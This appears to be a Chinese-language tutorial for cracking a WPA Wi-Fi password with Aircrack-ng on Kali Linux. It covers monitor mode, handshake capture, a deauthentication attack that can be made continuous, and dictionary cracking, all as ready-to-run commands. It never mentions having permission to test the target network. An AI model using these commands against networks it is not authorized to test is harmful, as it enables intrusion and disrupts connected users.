用windows版的Aircrack-ng就别想了,官方是这样说的
IMPORTANT Information Regarding Windows Version IMPORTANT
The windows version requires you to develop your own DLLs to link aircrack-ng to your wireless card. The required DLLs are not provided in the download nor available anywhere on the Internet. Without these DLLs, the windows version will not function. Do NOT post questions or problems to the forum regarding the windows version. At present, there is no support provided.
带monitor功能的外接USB网卡
参考链接:
https://blog.csdn.net/qq_28208251/article/details/47177785
https://blog.csdn.net/qq_28208251/article/details/47154501
https://www.aircrack-ng.org/doku.php?id=compatible_cards
ps:如果发现你的网卡不在这些资料里,但是支持monitor功能,可以把2和3安装好,用接下来的步骤测试一下自己的网卡支不支持Aircrack-ng
Kali Linux系统
https://www.kali.org/
字典
网上搜索或者自己做
打开Kali,登录后进入控制台(Terminal Emulator)
参考这篇文章或者官方文章开启网卡的monitor模式
ps:如果输入命令后显示bash:xxxxx:command not found,就要在每条命令行前加一个sudo命令,下文的命令也同样适用
成功开启monitor模式后,开始抓包
ps:这里写的是aircrack-ng驱动的网卡的抓包方法,madwifi-ng驱动的网卡的抓包方法需要稍做改动,参考官方文章的Aircrack-ng suite
首先kill掉影响监听的进程:
airmon-ng check kill
开启监听模式:
airodump-ng wlan0mon
根据ESSID判断你要抓包的路由,记录这个路由的BSSID和CH后,开始抓包:
airodump-ng -c 你记录的CH --bssid 你记录的BSSID -w 握手包放置路径 wlan0mon
抓包时耐心等待最下方的列表出现数据,出现数据之后记录STATION,如果等待的时间足够长,还能出现多个STATION。得到STATION之后开始对路由发起deauth攻击(50代表50次攻击,如果改成0就是一直攻击):
aireplay-ng -0 50 -a 你记录的BSSID -c 你记录的STATION wlan0mon
攻击结束后,查看有没有抓到可用的握手包:
aircrack-ng 握手包的位置
如果抓到包了,就开始跑字典:
aircrack-ng -w 字典的位置 握手包的位置
当然,你也可以把握手包拿到别的软件或者系统上跑字典,转移握手包的方法很多,可以直接用u盘,也可以安装VMware Tools使用共享文件夹,还可以使用虚拟机桥接或着NAT模式,教程网上都有,可以自己搜
推荐的跑字典软件:EWSA
如果有错误还请大家多多指教